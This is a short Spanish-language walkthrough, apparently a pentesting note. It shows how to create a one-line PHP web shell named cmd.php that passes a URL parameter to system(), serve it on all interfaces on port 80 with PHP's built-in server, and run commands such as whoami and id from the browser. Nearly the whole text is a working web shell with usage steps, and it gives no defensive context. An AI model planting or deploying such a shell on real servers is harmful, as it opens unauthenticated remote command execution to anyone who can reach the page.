1. Crear un file con el siguiente contenido con nombre **cmd.php**

```php
<?php
  system($_GET['cmd']);
?>
```

2. En el directorio donde se haya guardado, ejecutamos la siguiente instrucción
```bash
$ php -S 0.0.0.0:80
```

3. Ejecutar una instrucción desde la web
```
http://localhost/cmd.php?cmd=whoami
http://localhost/cmd.php?cmd=id
```
